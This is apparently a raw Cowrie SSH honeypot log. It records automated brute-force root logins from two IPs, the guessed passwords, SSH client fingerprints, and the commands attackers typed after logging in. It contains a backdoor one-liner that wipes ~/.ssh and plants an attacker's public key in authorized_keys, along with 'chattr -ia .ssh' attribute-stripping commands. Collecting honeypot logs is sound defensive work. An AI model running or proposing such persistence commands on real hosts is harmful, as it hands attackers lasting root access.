{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:59:17.191245Z","src_ip":"212.227.235.229","session":"9cc1d7384503"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44472,"dst_ip":"1.2.3.4","dst_port":22,"session":"a44d10de8436","protocol":"ssh","message":"New connection: 212.227.235.229:44472 (1.2.3.4:22) [session: a44d10de8436]","sensor":"my-vps","timestamp":"2025-08-31T05:59:17.291600Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:59:17.292518Z","src_ip":"212.227.235.229","session":"a44d10de8436"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:59:17.581943Z","src_ip":"212.227.235.229","session":"a44d10de8436"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:59:18.779578Z","src_ip":"212.227.235.229","session":"a44d10de8436"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:59:19.068514Z","src_ip":"212.227.235.229","session":"4d7d70d5dfea"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:59:19.070361Z","src_ip":"212.227.235.229","session":"a44d10de8436"}
{"eventid":"cowrie.login.failed","username":"test3","password":"123456789","message":"login attempt [test3/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T05:59:22.729564Z","src_ip":"212.227.235.229","session":"9cc1d7384503"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:59:24.470829Z","src_ip":"212.227.235.229","session":"9cc1d7384503"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45522,"dst_ip":"1.2.3.4","dst_port":22,"session":"0680dbf615dc","protocol":"ssh","message":"New connection: 212.227.235.229:45522 (1.2.3.4:22) [session: 0680dbf615dc]","sensor":"my-vps","timestamp":"2025-08-31T05:59:25.632694Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:59:25.633564Z","src_ip":"212.227.235.229","session":"0680dbf615dc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:59:25.891109Z","src_ip":"212.227.235.229","session":"0680dbf615dc"}
{"eventid":"cowrie.login.success","username":"root","password":"Test1234","message":"login attempt [root/Test1234] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:59:26.963084Z","src_ip":"212.227.235.229","session":"0680dbf615dc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:59:27.494320Z","src_ip":"212.227.235.229","session":"0680dbf615dc"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:59:27.495071Z","src_ip":"212.227.235.229","session":"0680dbf615dc"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:59:27.496068Z","src_ip":"212.227.235.229","session":"0680dbf615dc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:59:27.755508Z","src_ip":"212.227.235.229","session":"0680dbf615dc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:59:28.751677Z","src_ip":"212.227.235.229","session":"0680dbf615dc"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:59:28.752335Z","src_ip":"212.227.235.229","session":"0680dbf615dc"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:59:29.014158Z","src_ip":"212.227.235.229","session":"0680dbf615dc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:59:29.015206Z","src_ip":"212.227.235.229","session":"0680dbf615dc"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:59:29.043980Z","src_ip":"212.227.235.229","session":"a802118dae3c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:59:29.044619Z","src_ip":"212.227.235.229","session":"a802118dae3c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46644,"dst_ip":"1.2.3.4","dst_port":22,"session":"13248ce73ba3","protocol":"ssh","message":"New connection: 212.227.235.229:46644 (1.2.3.4:22) [session: 13248ce73ba3]","sensor":"my-vps","timestamp":"2025-08-31T05:59:29.268034Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:59:29.269523Z","src_ip":"212.227.235.229","session":"13248ce73ba3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:59:29.527444Z","src_ip":"212.227.235.229","session":"13248ce73ba3"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:59:30.596309Z","src_ip":"212.227.235.229","session":"13248ce73ba3"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:59:31.857046Z","src_ip":"212.227.235.229","session":"13248ce73ba3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47626,"dst_ip":"1.2.3.4","dst_port":22,"session":"c92b5acaccf2","protocol":"ssh","message":"New connection: 212.227.235.229:47626 (1.2.3.4:22) [session: c92b5acaccf2]","sensor":"my-vps","timestamp":"2025-08-31T05:59:32.112206Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:59:32.114547Z","src_ip":"212.227.235.229","session":"c92b5acaccf2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:59:32.371231Z","src_ip":"212.227.235.229","session":"c92b5acaccf2"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:59:33.399709Z","src_ip":"212.227.235.229","session":"c92b5acaccf2"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:59:33.658825Z","src_ip":"212.227.235.229","session":"0680dbf615dc"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:59:33.659674Z","src_ip":"212.227.235.229","session":"c92b5acaccf2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41754,"dst_ip":"1.2.3.4","dst_port":22,"session":"9fb220c53c6c","protocol":"ssh","message":"New connection: 212.227.125.160:41754 (1.2.3.4:22) [session: 9fb220c53c6c]","sensor":"my-vps","timestamp":"2025-08-31T05:59:36.824189Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:59:37.360593Z","src_ip":"212.227.125.160","session":"9fb220c53c6c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:59:37.361308Z","src_ip":"212.227.125.160","session":"9fb220c53c6c"}
{"eventid":"cowrie.login.failed","username":"test3","password":"123456789","message":"login attempt [test3/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T05:59:39.524884Z","src_ip":"212.227.125.160","session":"9fb220c53c6c"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:59:40.898327Z","src_ip":"212.227.125.160","session":"9fb220c53c6c"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz@WSX","message":"login attempt [root/1qaz@WSX] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:59:43.775403Z","src_ip":"212.227.125.160","session":"5ec5910e20e6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49858,"dst_ip":"1.2.3.4","dst_port":22,"session":"2bc1291cafa6","protocol":"ssh","message":"New connection: 212.227.125.160:49858 (1.2.3.4:22) [session: 2bc1291cafa6]","sensor":"my-vps","timestamp":"2025-08-31T05:59:45.862924Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45824,"dst_ip":"1.2.3.4","dst_port":22,"session":"fe53d4f18d37","protocol":"ssh","message":"New connection: 212.227.235.229:45824 (1.2.3.4:22) [session: fe53d4f18d37]","sensor":"my-vps","timestamp":"2025-08-31T05:59:47.877894Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:59:47.878961Z","src_ip":"212.227.235.229","session":"fe53d4f18d37"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:59:48.147971Z","src_ip":"212.227.235.229","session":"fe53d4f18d37"}
{"eventid":"cowrie.login.success","username":"root","password":"!@#sa321","message":"login attempt [root/!@#sa321] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:59:49.267110Z","src_ip":"212.227.235.229","session":"fe53d4f18d37"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:59:49.826579Z","src_ip":"212.227.235.229","session":"fe53d4f18d37"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:59:49.827570Z","src_ip":"212.227.235.229","session":"fe53d4f18d37"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:59:49.828803Z","src_ip":"212.227.235.229","session":"fe53d4f18d37"}
{"eventid":"cowrie.session.closed","duration":"301.1","message":"Connection lost after 301.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:59:49.970491Z","src_ip":"212.227.235.229","session":"796b82e4ff52"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:59:50.099494Z","src_ip":"212.227.235.229","session":"fe53d4f18d37"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:59:50.696149Z","src_ip":"212.227.235.229","session":"fe53d4f18d37"}
